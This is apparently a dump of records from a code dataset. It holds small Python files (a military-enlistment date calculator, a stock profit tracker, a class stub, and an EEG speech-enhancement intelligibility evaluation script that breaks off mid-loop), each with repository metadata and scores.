<reponame>RafaFurla/Python-Exercises<gh_stars>1-10 from datetime import date d = int(input('In what day did you birth? ')) m = int(input('In what month did you birth? ')) y = int(input('In what year did you birth? ')) td = date.today().day tm = date.today().month ty = date.today().year if ty < y+18: difm = (12 - tm + m) / 12 dif = (y+18-1-ty+difm) // 1 print(dif) print('Você ainda terá que se alistar no serviço militar! Falta(m) ', dif, ' ano(s) e {:.1f} mes(es)' .format((difm - (difm // 1)) * 12)) if ty > y+18: difm = (12 - m + tm) / 12 dif = ((ty-1)-(y+18)+difm) // 1 print('Passaram-se ', dif, ' ano(s) e {:.1f} mes(es) do seu alistamento militar obrigatório!' .format((difm - (difm // 1)) * 12)) if ty == y+18: if tm < m: difm = (m - tm) print('Você ainda terá que se alistar no serviço militar! Faltam ', difm, ' mes(es)') if tm > m: difm = (tm - m) print('Já se passou ', difm, ' mes(es) do seu tempo de alistamento!') if tm == m: if td < d: print('Você ainda terá que se alistar no serviço militar! Faltam: ', d - td, 'dia(s)') if td > d: print('Já se passou ', td - d, ' dia(s) do seu tempo de alistamento!') if td == d: print('Hora de se alistar!')
from datetime import date d = int(input('In what day did you birth? ')) m = int(input('In what month did you birth? ')) y = int(input('In what year did you birth? ')) td = date.today().day tm = date.today().month ty = date.today().year if ty < y+18: difm = (12 - tm + m) / 12 dif = (y+18-1-ty+difm) // 1 print(dif) print('Você ainda terá que se alistar no serviço militar! Falta(m) ', dif, ' ano(s) e {:.1f} mes(es)' .format((difm - (difm // 1)) * 12)) if ty > y+18: difm = (12 - m + tm) / 12 dif = ((ty-1)-(y+18)+difm) // 1 print('Passaram-se ', dif, ' ano(s) e {:.1f} mes(es) do seu alistamento militar obrigatório!' .format((difm - (difm // 1)) * 12)) if ty == y+18: if tm < m: difm = (m - tm) print('Você ainda terá que se alistar no serviço militar! Faltam ', difm, ' mes(es)') if tm > m: difm = (tm - m) print('Já se passou ', difm, ' mes(es) do seu tempo de alistamento!') if tm == m: if td < d: print('Você ainda terá que se alistar no serviço militar! Faltam: ', d - td, 'dia(s)') if td > d: print('Já se passou ', td - d, ' dia(s) do seu tempo de alistamento!') if td == d: print('Hora de se alistar!')
none
1
3.908863
4
win_or_lost_each_day.py
hvnobug/stock
3,401
6623623
<reponame>hvnobug/stock # -*-coding=utf-8-*- __author__ = 'Rocky' ''' http://30daydo.com Contact: <EMAIL> ''' ''' 记录每天的盈亏情况 完成度100% ''' import pandas as pd import os import tushare as ts import datetime def getCodeFromExcel(filename): #从excel表中获取代码, 并且补充前面几位000 #获取股票数目 df=pd.read_excel(filename) code_list = df['证券代码'].values quantity_list=df['股票余额'].values code=[] quantity=[] for i in range(len(code_list)): code.append(str(code_list[i]).zfill(6)) #后面学会了map函数,可以直接搞定 quantity.append(quantity_list[i]) return code,quantity def calc(code): settlement = df[df['code']==code]['settlement'].values percentage = df[df['code']==code]['changepercent'].values trade = df[df['code']==code]['trade'].values #print(percentage) #settlement=df[df['code'==code]]['settlement'].values #percentage=df[df['code'==code].index]['changepercent'].values #返回四舍五入的结果 return settlement,percentage,trade def today_win_lost(filename_path): filename=os.path.join(filename_path,'ownstock.xls') code,quantity=getCodeFromExcel(filename) result=[] percentage_list=[] trade_list=[] for i in range(len(code)): settlement,percentage,trade=calc(code[i]) print("settlement", settlement) print("percent", percentage) print("trade", trade) profit=round(settlement[0]*percentage[0]*quantity[i]*0.01,1) result.append(profit) percentage_list.append(percentage[0]) trade_list.append(trade[0]) return result,code,percentage_list,trade_list def join_dataframe(filename,today): current_profile=today+'当天贡献' result,code,percentage_list,trade_list=today_win_lost() s1=pd.DataFrame({current_profile:result}) #s2=pd.DataFrame({'当天涨幅':percentage_list}) #s3=pd.DataFrame({'当天价钱':trade_list}) #print(s) df=pd.read_excel(filename) #del df['交易市场'] #del df['股东帐户'] #del df['盈亏比(%)'] #del df['在途数量'] #del df['当天贡献'] #del df[''] #del df[''] df['证券代码']=code #print(code) df['市价']=trade_list df['当天涨幅']=percentage_list #可以这样直接替换某一列的值 #df=df.join(s2,how='right') df=df.join(s1,how='right') #df=df.join(s3,how='right') return df def main(today): 
path=os.path.join(os.path.dirname(__file__),'data') filename=os.path.join(path,'each_day_profile.xls') org_filename=os.path.join(path,'2016-09-30_all_.xls') #df_filename=os.path.join(path,'each_day_profile.xls') #df=pd.read_excel(org_filename) df=ts.get_today_all() new_df=join_dataframe(filename,today) save_name=os.path.join(path,"each_day_profile.xls") #这样会不会把原来的覆盖掉? new_df.to_excel(save_name) if __name__ == "__main__": today=datetime.datetime.now().strftime("%Y-%m-%d") if not ts.is_holiday(today): main(today)
# -*-coding=utf-8-*- __author__ = 'Rocky' ''' http://30daydo.com Contact: <EMAIL> ''' ''' 记录每天的盈亏情况 完成度100% ''' import pandas as pd import os import tushare as ts import datetime def getCodeFromExcel(filename): #从excel表中获取代码, 并且补充前面几位000 #获取股票数目 df=pd.read_excel(filename) code_list = df['证券代码'].values quantity_list=df['股票余额'].values code=[] quantity=[] for i in range(len(code_list)): code.append(str(code_list[i]).zfill(6)) #后面学会了map函数,可以直接搞定 quantity.append(quantity_list[i]) return code,quantity def calc(code): settlement = df[df['code']==code]['settlement'].values percentage = df[df['code']==code]['changepercent'].values trade = df[df['code']==code]['trade'].values #print(percentage) #settlement=df[df['code'==code]]['settlement'].values #percentage=df[df['code'==code].index]['changepercent'].values #返回四舍五入的结果 return settlement,percentage,trade def today_win_lost(filename_path): filename=os.path.join(filename_path,'ownstock.xls') code,quantity=getCodeFromExcel(filename) result=[] percentage_list=[] trade_list=[] for i in range(len(code)): settlement,percentage,trade=calc(code[i]) print("settlement", settlement) print("percent", percentage) print("trade", trade) profit=round(settlement[0]*percentage[0]*quantity[i]*0.01,1) result.append(profit) percentage_list.append(percentage[0]) trade_list.append(trade[0]) return result,code,percentage_list,trade_list def join_dataframe(filename,today): current_profile=today+'当天贡献' result,code,percentage_list,trade_list=today_win_lost() s1=pd.DataFrame({current_profile:result}) #s2=pd.DataFrame({'当天涨幅':percentage_list}) #s3=pd.DataFrame({'当天价钱':trade_list}) #print(s) df=pd.read_excel(filename) #del df['交易市场'] #del df['股东帐户'] #del df['盈亏比(%)'] #del df['在途数量'] #del df['当天贡献'] #del df[''] #del df[''] df['证券代码']=code #print(code) df['市价']=trade_list df['当天涨幅']=percentage_list #可以这样直接替换某一列的值 #df=df.join(s2,how='right') df=df.join(s1,how='right') #df=df.join(s3,how='right') return df def main(today): 
path=os.path.join(os.path.dirname(__file__),'data') filename=os.path.join(path,'each_day_profile.xls') org_filename=os.path.join(path,'2016-09-30_all_.xls') #df_filename=os.path.join(path,'each_day_profile.xls') #df=pd.read_excel(org_filename) df=ts.get_today_all() new_df=join_dataframe(filename,today) save_name=os.path.join(path,"each_day_profile.xls") #这样会不会把原来的覆盖掉? new_df.to_excel(save_name) if __name__ == "__main__": today=datetime.datetime.now().strftime("%Y-%m-%d") if not ts.is_holiday(today): main(today)
zh
0.270093
# -*-coding=utf-8-*- http://30daydo.com Contact: <EMAIL> 记录每天的盈亏情况 完成度100% #从excel表中获取代码, 并且补充前面几位000 #获取股票数目 #后面学会了map函数,可以直接搞定 #print(percentage) #settlement=df[df['code'==code]]['settlement'].values #percentage=df[df['code'==code].index]['changepercent'].values #返回四舍五入的结果 #s2=pd.DataFrame({'当天涨幅':percentage_list}) #s3=pd.DataFrame({'当天价钱':trade_list}) #print(s) #del df['交易市场'] #del df['股东帐户'] #del df['盈亏比(%)'] #del df['在途数量'] #del df['当天贡献'] #del df[''] #del df[''] #print(code) #可以这样直接替换某一列的值 #df=df.join(s2,how='right') #df=df.join(s3,how='right') #df_filename=os.path.join(path,'each_day_profile.xls') #df=pd.read_excel(org_filename) #这样会不会把原来的覆盖掉?
3.036712
3
AutoExamSys/SystemModel/UsersClass/teacher.py
Yb-Z/COMP2411_GP
0
6623624
#!/usr/bin/env python # -*- coding: UTF-8 -*- import pandas as pd ''' Functions 1. Get personal info. ... TODO ''' class Teacher(object): def __init__(self, config): self.id;
#!/usr/bin/env python # -*- coding: UTF-8 -*- import pandas as pd ''' Functions 1. Get personal info. ... TODO ''' class Teacher(object): def __init__(self, config): self.id;
en
0.253096
#!/usr/bin/env python # -*- coding: UTF-8 -*- Functions 1. Get personal info. ... TODO
2.645635
3
control_limits/__init__.py
papelero/control-limit-search
0
6623625
from .src import ControlLimits, plot_control_limits
from .src import ControlLimits, plot_control_limits
none
1
1.032779
1
tools/LoadAndFindIntelligibility.py
MaryamHoss/BESD
0
6623626
<reponame>MaryamHoss/BESD # this will load noisy, clean and different predictions import os, sys import h5py as hp import matplotlib.pyplot as plt sys.path.append('../') import tensorflow as tf import numpy as np sound_len = 87552 # 218880 from TrialsOfNeuralVocalRecon.tools.calculate_intelligibility import find_intel from TrialsOfNeuralVocalRecon.tools.utils.losses import * #load noisy file #test_path= 'C:/Users/hoss3301/work/TrialsOfNeuralVocalRecon/data/Cocktail_Party/Normalized/' exp_folder='C:/Users/hoss3301/work/TrialsOfNeuralVocalRecon/experiments/CC/sisdr/with my changes/3-both speakers\Linear/'#'Linear/' #test_path='D:/data/EEG processed data/luca way' test_path='D:/data/EEG processed data/2_sec' #exp_folder='C:/Users/hoss3301/work/TrialsOfNeuralVocalRecon/experiments/CC/sisdr/with my changes/6/' #exp_folder='C:/Users/hoss3301/work/TrialsOfNeuralVocalRecon/experiments/CC/sisdr/with my changes/9-luca data/2020-09-15/' file=hp.File(test_path+'/noisy_test.h5','r') snd=file['noisy_test'][:] file.close() snd=snd[:,0:sound_len,:] snd=snd[:,::3,:] file=hp.File(test_path+'/eegs_test.h5','r') eeg=file['eegs_test'][:] file.close() #load clean sound file=hp.File(test_path+'/clean_test.h5','r') clean=file['clean_test'][:] file.close() clean=clean[:,0:sound_len,:] clean=clean[:,::3,:] #### do the prediction: With_spike=exp_folder+'noSpike/trained_models/model_weights_noSpikes_pre' #model_weights_WithSpikes_predict.h5' model=tf.keras.models.load_model(With_spike, custom_objects={'si_sdr_loss': si_sdr_loss}) prediction_withSpikes_film1=model.predict([snd,eeg]) np.save(exp_folder+'film1/prediction',prediction_withSpikes_film1) #intel_matrix=np.zeros(shape=(833,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr #load prediction with spikes exp_type='film1' size=prediction_withSpikes_film1.shape[0] intel_matrix_film1=np.zeros(shape=(size,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr prediction_withSpikes_film1=np.load(exp_folder+exp_type+'/prediction.npy') 
intel_matrix_film1=np.load(exp_folder+exp_type+'/loss_matrix.npy') for i in range(size): print(i) intel_matrix_film1[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film1[i:i+1,:,:]) for i in range(size): print(i) intel_matrix_film1[i,1]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film1[i:i+1,:,:],metric='stoi') for i in range(size): print(i) intel_matrix_film1[i,2]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film1[i:i+1,:,:],metric='estoi') for i in range(size): print(i) intel_matrix_film1[i,3]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film1[i:i+1,:,:],metric='si-sdr') # for i in range(size): # print(i) # c[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film1[i:i+1,:,:],metric='stsa-mse') np.save(exp_folder+'film1/loss_matrix',intel_matrix_film1) #load prediction with spikes exp_type='film2' size=prediction_withSpikes_film2.shape[0] intel_matrix_film2=np.zeros(shape=(size,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr prediction_withSpikes_film2=np.load(exp_folder+exp_type+'/prediction.npy') intel_matrix_film2=np.load(exp_folder+exp_type+'/loss_matrix.npy') for i in range(size): print(i) intel_matrix_film2[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film2[i:i+1,:,:]) for i in range(size): print(i) intel_matrix_film2[i,1]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film2[i:i+1,:,:],metric='stoi') for i in range(size): print(i) intel_matrix_film2[i,2]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film2[i:i+1,:,:],metric='estoi') for i in range(size): print(i) intel_matrix_film2[i,3]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film2[i:i+1,:,:],metric='si-sdr') # for i in range(size): # print(i) # c[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film2[i:i+1,:,:],metric='stsa-mse') np.save(exp_folder+'film2/loss_matrix',intel_matrix_film2) #load prediction with spikes exp_type='film3' size=prediction_withSpikes_film3.shape[0] intel_matrix_film3=np.zeros(shape=(size,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr 
prediction_withSpikes_film3=np.load(exp_folder+exp_type+'/prediction.npy') intel_matrix_film3=np.load(exp_folder+exp_type+'/loss_matrix.npy') for i in range(size): print(i) intel_matrix_film3[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film3[i:i+1,:,:]) for i in range(size): print(i) intel_matrix_film3[i,1]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film3[i:i+1,:,:],metric='stoi') for i in range(size): print(i) intel_matrix_film3[i,2]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film3[i:i+1,:,:],metric='estoi') for i in range(size): print(i) intel_matrix_film3[i,3]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film3[i:i+1,:,:],metric='si-sdr') np.save(exp_folder+'film3/loss_matrix',intel_matrix_film3) #load prediction with spikes exp_type='film4' size=prediction_withSpikes_film4.shape[0] intel_matrix_film4=np.zeros(shape=(size,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr prediction_withSpikes_film4=np.load(exp_folder+exp_type+'/prediction.npy') intel_matrix_film4=np.load(exp_folder+exp_type+'/loss_matrix.npy') for i in range(size): print(i) intel_matrix_film4[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film4[i:i+1,:,:]) for i in range(size): print(i) intel_matrix_film4[i,1]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film4[i:i+1,:,:],metric='stoi') for i in range(size): print(i) intel_matrix_film4[i,2]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film4[i:i+1,:,:],metric='estoi') for i in range(size): print(i) intel_matrix_film4[i,3]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film4[i:i+1,:,:],metric='si-sdr') np.save(exp_folder+'film4/loss_matrix',intel_matrix_film4) #load prediction with spikes exp_type='add' intel_matrix_add=np.zeros(shape=(833,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr prediction_withSpikes_add=np.load(exp_folder+exp_type+'/prediction.npy') intel_matrix_add=np.load(exp_folder+exp_type+'/loss_matrix.npy') for i in range(833): print(i) 
intel_matrix_add[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_add[i:i+1,:,:]) for i in range(833): print(i) intel_matrix_add[i,1]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_add[i:i+1,:,:],metric='stoi') for i in range(833): print(i) intel_matrix_add[i,2]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_add[i:i+1,:,:],metric='estoi') for i in range(833): print(i) intel_matrix_add[i,3]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_add[i:i+1,:,:],metric='si-sdr') #load prediction with spikes exp_type='choice' intel_matrix_choice=np.zeros(shape=(833,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr prediction_withSpikes_choice=np.load(exp_folder+exp_type+'/prediction.npy') intel_matrix_choice=np.load(exp_folder+exp_type+'/loss_matrix.npy') for i in range(833): print(i) intel_matrix_choice[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_choice[i:i+1,:,:]) for i in range(833): print(i) intel_matrix_choice[i,1]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_choice[i:i+1,:,:],metric='stoi') for i in range(833): print(i) intel_matrix_choice[i,2]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_choice[i:i+1,:,:],metric='estoi') for i in range(833): print(i) intel_matrix_choice[i,3]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_choice[i:i+1,:,:],metric='si-sdr') #load prediction with spikes exp_type='concatenate' intel_matrix_concatenate=np.zeros(shape=(833,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr prediction_withSpikes_concatenate=np.load(exp_folder+exp_type+'/prediction.npy') intel_matrix_concatenate=np.load(exp_folder+exp_type+'/loss_matrix.npy') for i in range(833): print(i) intel_matrix_concatenate[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_concatenate[i:i+1,:,:]) for i in range(833): print(i) intel_matrix_concatenate[i,1]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_concatenate[i:i+1,:,:],metric='stoi') for i in range(833): print(i) 
intel_matrix_concatenate[i,2]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_concatenate[i:i+1,:,:],metric='estoi') for i in range(833): print(i) intel_matrix_concatenate[i,3]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_concatenate[i:i+1,:,:],metric='si-sdr') #no spikes exp_type='noSpike' size=prediction_noSpike.shape[0] intel_matrix_noSpike=np.zeros(shape=(size,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr prediction_noSpike=np.load(exp_folder+exp_type+'/prediction.npy') intel_matrix_noSpike=np.load(exp_folder+exp_type+'/loss_matrix.npy') for i in range(size): print(i) intel_matrix_noSpike[i,0]=find_intel(clean[i:i+1,:,:],prediction_noSpike[i:i+1,:,:]) for i in range(size): print(i) intel_matrix_noSpike[i,1]=find_intel(clean[i:i+1,:,:],prediction_noSpike[i:i+1,:,:],metric='stoi') for i in range(size): print(i) intel_matrix_noSpike[i,2]=find_intel(clean[i:i+1,:,:],prediction_noSpike[i:i+1,:,:],metric='estoi') for i in range(size): print(i) intel_matrix_noSpike[i,3]=find_intel(clean[i:i+1,:,:],prediction_noSpike[i:i+1,:,:],metric='si-sdr') np.save(exp_folder+exp_type+'loss_matrix',intel_matrix_noSpike) import h5py as hp exp_type='noisy' intel_matrix_noisy=np.zeros(shape=(size,1)) #0:pesq 1:stoi 2:estoi 3:si-sdr file=hp.File(test_path+'/noisy_test.h5','r') snd=file['noisy_test'][:] file.close() snd=snd[:,0:sound_len,:] snd=snd[:,::3,:] size=snd.shape[0] intel_matrix_noisy=np.zeros(shape=(size,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr intel_matrix_noisy=np.load(exp_folder+'loss_matrix_noisy.npy') for i in range(size): print(i) intel_matrix_noisy[i,0]=find_intel(clean[i:i+1,:,:],snd[i:i+1,:,:]) for i in range(size): print(i) intel_matrix_noisy[i,1]=find_intel(clean[i:i+1,:,:],snd[i:i+1,:,:],metric='stoi') for i in range(size): print(i) intel_matrix_noisy[i,2]=find_intel(clean[i:i+1,:,:],snd[i:i+1,:,:],metric='estoi') for i in range(size): print(i) intel_matrix_noisy[i,3]=find_intel(clean[i:i+1,:,:],snd[i:i+1,:,:],metric='si-sdr') 
np.save(exp_folder+'loss_matrix_noisy',intel_matrix_noisy) exp_folder = '../data' intel_matrix_noisy = np.load(exp_folder + '/loss_matrix_wo_eeg.npy') intel_matrix = np.load(exp_folder + '/loss_matrix_with_eeg.npy') fusions = ['film1', 'film2', 'film3', 'film4', 'add', 'concat', 'choice', 'noSp', 'noisy'] metrics = ['pesq', 'stoi', 'estoi', 'si-sdr'] fusions = ['mixture', 'BESD'] metrics = ['PESQ', 'STOI', 'ESTOI', 'SI-SDR'] data = [] z = 2 # data.append(intel_matrix_film1[:,z]) # data.append(intel_matrix_film2[:,z]) # data.append(intel_matrix_film3[:,z]) # data.append(intel_matrix_film4[:,z]) # data.append(intel_matrix_add[:,z]) # data.append(intel_matrix_concatenate[:,z]) # data.append(intel_matrix_choice[:,z]) # data.append(intel_matrix_noSpike[:,z]) data.append(intel_matrix_noisy[:, z]) #data.append(intel_matrix_noSpike[:, z]) data.append(intel_matrix[:, z]) ld = len(metrics) lm = len(fusions) width = 1 / lm - .05 X = np.arange(ld) """ fig = plt.figure() ax = fig.add_axes([0, 0, 1, 1]) for i in range(lm): ax.bar(X + i * width, data[i], width=width) ax.set_ylabel('intelligibility') plt.xticks(X + lm * width / 2, metrics) fusions = [f.replace('_', '') for f in fusions] ax.legend(labels=fusions) #plt.savefig(os.path.join(plot_one_path, 'plot_bars_accs.png'), bbox_inches="tight") """ num_boxes = len(data) pos = np.arange(num_boxes) + 1 medians = np.zeros(shape=len(data)) for i in range(num_boxes): medians[i] = np.median(data[i]) upper_labels = [str(np.round(s, 2)) for s in medians] weights = ['bold', 'semibold'] """ fig1, ax1 = plt.subplots() ax1.boxplot(data, labels=fusions) ax1.set_title(metrics[z]) ax1.yaxis.grid(True, linestyle='-', which='major', color='lightgrey', alpha=0.5) for tick, label in zip(range(num_boxes), ax1.get_xticklabels()): k = tick % 2 ax1.text(pos[tick], .95, upper_labels[tick], transform=ax1.get_xaxis_transform(), horizontalalignment='center', size='x-small', weight=weights[k]) plt.show() """ fig, ax = plt.subplots() violin_handle = 
ax.violinplot(data, showmeans=False, showmedians=False, showextrema=False, widths=.7) colors = plt.cm.gist_ncar(np.linspace(0.2, .8, len(violin_handle['bodies']))) np.random.seed(0) colors = plt.cm.twilight(np.random.rand(len(violin_handle['bodies']))) np.random.shuffle(colors) for pc, c in zip(violin_handle['bodies'], colors): pc.set_facecolor(c) pc.set_edgecolor('black') pc.set_alpha(1.) for tick, label in zip(range(num_boxes), ax.get_xticklabels()): k = tick % 2 ax.text(pos[tick], .95, upper_labels[tick], transform=ax.get_xaxis_transform(), horizontalalignment='center', size='x-small', weight=weights[k]) ax.set_ylabel(metrics[z]) ax.set_ylim(-10, 15) plt.xticks(np.arange(len(fusions)) + 1, fusions) plt.show() fig.savefig('cocktail_sisdr_violins.pdf', bbox_inches='tight')
# this will load noisy, clean and different predictions import os, sys import h5py as hp import matplotlib.pyplot as plt sys.path.append('../') import tensorflow as tf import numpy as np sound_len = 87552 # 218880 from TrialsOfNeuralVocalRecon.tools.calculate_intelligibility import find_intel from TrialsOfNeuralVocalRecon.tools.utils.losses import * #load noisy file #test_path= 'C:/Users/hoss3301/work/TrialsOfNeuralVocalRecon/data/Cocktail_Party/Normalized/' exp_folder='C:/Users/hoss3301/work/TrialsOfNeuralVocalRecon/experiments/CC/sisdr/with my changes/3-both speakers\Linear/'#'Linear/' #test_path='D:/data/EEG processed data/luca way' test_path='D:/data/EEG processed data/2_sec' #exp_folder='C:/Users/hoss3301/work/TrialsOfNeuralVocalRecon/experiments/CC/sisdr/with my changes/6/' #exp_folder='C:/Users/hoss3301/work/TrialsOfNeuralVocalRecon/experiments/CC/sisdr/with my changes/9-luca data/2020-09-15/' file=hp.File(test_path+'/noisy_test.h5','r') snd=file['noisy_test'][:] file.close() snd=snd[:,0:sound_len,:] snd=snd[:,::3,:] file=hp.File(test_path+'/eegs_test.h5','r') eeg=file['eegs_test'][:] file.close() #load clean sound file=hp.File(test_path+'/clean_test.h5','r') clean=file['clean_test'][:] file.close() clean=clean[:,0:sound_len,:] clean=clean[:,::3,:] #### do the prediction: With_spike=exp_folder+'noSpike/trained_models/model_weights_noSpikes_pre' #model_weights_WithSpikes_predict.h5' model=tf.keras.models.load_model(With_spike, custom_objects={'si_sdr_loss': si_sdr_loss}) prediction_withSpikes_film1=model.predict([snd,eeg]) np.save(exp_folder+'film1/prediction',prediction_withSpikes_film1) #intel_matrix=np.zeros(shape=(833,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr #load prediction with spikes exp_type='film1' size=prediction_withSpikes_film1.shape[0] intel_matrix_film1=np.zeros(shape=(size,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr prediction_withSpikes_film1=np.load(exp_folder+exp_type+'/prediction.npy') intel_matrix_film1=np.load(exp_folder+exp_type+'/loss_matrix.npy') 
for i in range(size): print(i) intel_matrix_film1[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film1[i:i+1,:,:]) for i in range(size): print(i) intel_matrix_film1[i,1]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film1[i:i+1,:,:],metric='stoi') for i in range(size): print(i) intel_matrix_film1[i,2]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film1[i:i+1,:,:],metric='estoi') for i in range(size): print(i) intel_matrix_film1[i,3]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film1[i:i+1,:,:],metric='si-sdr') # for i in range(size): # print(i) # c[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film1[i:i+1,:,:],metric='stsa-mse') np.save(exp_folder+'film1/loss_matrix',intel_matrix_film1) #load prediction with spikes exp_type='film2' size=prediction_withSpikes_film2.shape[0] intel_matrix_film2=np.zeros(shape=(size,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr prediction_withSpikes_film2=np.load(exp_folder+exp_type+'/prediction.npy') intel_matrix_film2=np.load(exp_folder+exp_type+'/loss_matrix.npy') for i in range(size): print(i) intel_matrix_film2[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film2[i:i+1,:,:]) for i in range(size): print(i) intel_matrix_film2[i,1]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film2[i:i+1,:,:],metric='stoi') for i in range(size): print(i) intel_matrix_film2[i,2]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film2[i:i+1,:,:],metric='estoi') for i in range(size): print(i) intel_matrix_film2[i,3]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film2[i:i+1,:,:],metric='si-sdr') # for i in range(size): # print(i) # c[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film2[i:i+1,:,:],metric='stsa-mse') np.save(exp_folder+'film2/loss_matrix',intel_matrix_film2) #load prediction with spikes exp_type='film3' size=prediction_withSpikes_film3.shape[0] intel_matrix_film3=np.zeros(shape=(size,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr prediction_withSpikes_film3=np.load(exp_folder+exp_type+'/prediction.npy') 
intel_matrix_film3=np.load(exp_folder+exp_type+'/loss_matrix.npy') for i in range(size): print(i) intel_matrix_film3[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film3[i:i+1,:,:]) for i in range(size): print(i) intel_matrix_film3[i,1]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film3[i:i+1,:,:],metric='stoi') for i in range(size): print(i) intel_matrix_film3[i,2]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film3[i:i+1,:,:],metric='estoi') for i in range(size): print(i) intel_matrix_film3[i,3]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film3[i:i+1,:,:],metric='si-sdr') np.save(exp_folder+'film3/loss_matrix',intel_matrix_film3) #load prediction with spikes exp_type='film4' size=prediction_withSpikes_film4.shape[0] intel_matrix_film4=np.zeros(shape=(size,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr prediction_withSpikes_film4=np.load(exp_folder+exp_type+'/prediction.npy') intel_matrix_film4=np.load(exp_folder+exp_type+'/loss_matrix.npy') for i in range(size): print(i) intel_matrix_film4[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film4[i:i+1,:,:]) for i in range(size): print(i) intel_matrix_film4[i,1]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film4[i:i+1,:,:],metric='stoi') for i in range(size): print(i) intel_matrix_film4[i,2]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film4[i:i+1,:,:],metric='estoi') for i in range(size): print(i) intel_matrix_film4[i,3]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film4[i:i+1,:,:],metric='si-sdr') np.save(exp_folder+'film4/loss_matrix',intel_matrix_film4) #load prediction with spikes exp_type='add' intel_matrix_add=np.zeros(shape=(833,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr prediction_withSpikes_add=np.load(exp_folder+exp_type+'/prediction.npy') intel_matrix_add=np.load(exp_folder+exp_type+'/loss_matrix.npy') for i in range(833): print(i) intel_matrix_add[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_add[i:i+1,:,:]) for i in range(833): print(i) 
intel_matrix_add[i,1]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_add[i:i+1,:,:],metric='stoi') for i in range(833): print(i) intel_matrix_add[i,2]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_add[i:i+1,:,:],metric='estoi') for i in range(833): print(i) intel_matrix_add[i,3]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_add[i:i+1,:,:],metric='si-sdr') #load prediction with spikes exp_type='choice' intel_matrix_choice=np.zeros(shape=(833,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr prediction_withSpikes_choice=np.load(exp_folder+exp_type+'/prediction.npy') intel_matrix_choice=np.load(exp_folder+exp_type+'/loss_matrix.npy') for i in range(833): print(i) intel_matrix_choice[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_choice[i:i+1,:,:]) for i in range(833): print(i) intel_matrix_choice[i,1]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_choice[i:i+1,:,:],metric='stoi') for i in range(833): print(i) intel_matrix_choice[i,2]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_choice[i:i+1,:,:],metric='estoi') for i in range(833): print(i) intel_matrix_choice[i,3]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_choice[i:i+1,:,:],metric='si-sdr') #load prediction with spikes exp_type='concatenate' intel_matrix_concatenate=np.zeros(shape=(833,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr prediction_withSpikes_concatenate=np.load(exp_folder+exp_type+'/prediction.npy') intel_matrix_concatenate=np.load(exp_folder+exp_type+'/loss_matrix.npy') for i in range(833): print(i) intel_matrix_concatenate[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_concatenate[i:i+1,:,:]) for i in range(833): print(i) 